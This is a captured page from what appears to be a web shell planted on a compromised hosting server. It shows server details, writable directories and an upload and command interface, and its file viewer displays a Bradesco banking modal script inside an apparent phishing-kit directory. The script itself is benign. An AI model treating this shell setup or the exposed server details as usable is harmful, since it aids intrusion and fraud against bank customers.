Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 13.58.84.207
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/sacbradescolivelo/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/sacbradescolivelo/js/intervencao.js
var novoIB = {

    _onLoad: function() {

        novoIB.topBar();

    },

    getCookie: function(c_name) {

        if (document.cookie.length > 0) {
            c_start = document.cookie.indexOf(c_name + "=");
            if (c_start != -1) {
                c_start = c_start + c_name.length + 1;
                c_end = document.cookie.indexOf(";", c_start);
                if (c_end == -1) {
                    c_end = document.cookie.length;
                }
                return unescape(document.cookie.substring(c_start, c_end));
            }
        }

        return "";

    },

    createCookie: function(name, value, days) {

        var expires;

        if (days) {
            var date = new Date();
            date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
            expires = "; expires=" + date.toGMTString();
        } else {
            expires = "";
        }

        document.cookie = name + "=" + value + expires + "; path=/";

    },

    openModalNovoIB: function(pathImage,segmentName) {

        var msgTitleModal = "Em um só lugar, você pega os Informes de Rendimentos pra declarar seu Imposto de Renda." + "\n" + "Acesse sua conta pelo Internet Banking e clique em Mais Opções, Informe de Rendimentos.";
        var msgAltModal   = "Em um só lugar, você pega os Informes de Rendimentos pra declarar seu Imposto de Renda." + "\n" + "Acesse sua conta pelo Internet Banking e clique em Mais Opções, Informe de Rendimentos.";

        $.magnificPopup.open({

            tClose: 'Fechar',
            tLoading: 'Carregando...',
            items: {
                src: pathImage,
                titleSrc: 'Fechar'
            },
            type: 'image',
            callbacks: {
                beforeClose: function() {
                    $("#Form60").submit();
                },
            },
        });

        $('.mfp-title').hide();
        $('img.mfp-img').attr('title', msgTitleModal).attr('alt', msgAltModal);
        $('.mfp-close').html('X');
        $('.mfp-close').css('color', 'white');
        $('.mfp-close').css('cursor', 'pointer');
        $('.mfp-close').attr('onclick', 'trackBradesco("Portal '+segmentName.toUpperCase()+' - Home","Cabeçalho","Acessar a conta - fechar")');
    },

    topBar: function() {

        var nib_urlSegmento       = window.location.href;
        var nib_urlImgIntervencao = "";
        var nib_segmento          = "";

        if ( nib_urlSegmento.indexOf( "/html/classic/" ) != -1 ) {
            nib_segmento="classic";
        }

        if ( nib_urlSegmento.indexOf( "/html/exclusive/" ) != -1 ) {
            nib_segmento="exclusive";
        }

        if ( nib_urlSegmento.indexOf( "/html/prime/" ) != -1 ) {
            nib_segmento="prime";
        }

        if ( nib_urlSegmento.indexOf( "/html/private/" ) != -1 ) {
            nib_segmento="private";
        }

        nib_urlImgIntervencao = "/assets/common/img/novoIb/"+nib_segmento+".jpg";

        $('.btn-ok').click(function(event) {

            event.preventDefault();
           
            if(nib_segmento == "private"){
                novoIB.createCookie("qtd-intervencao", 4);
                $("#Form60").submit();
            }

            var qtdViewsModal = novoIB.getCookie("qtd-intervencao");
            
            if(qtdViewsModal >= 3) {
                $("#Form60").submit();
            } else {
                qtdViewsModal++;                
                novoIB.createCookie("qtd-intervencao", qtdViewsModal);
                novoIB.openModalNovoIB(nib_urlImgIntervencao, nib_segmento);
            }            
        });
    }
}

novoIB._onLoad();

Youez - 2016 - github.com/yon3zu
LinuXploit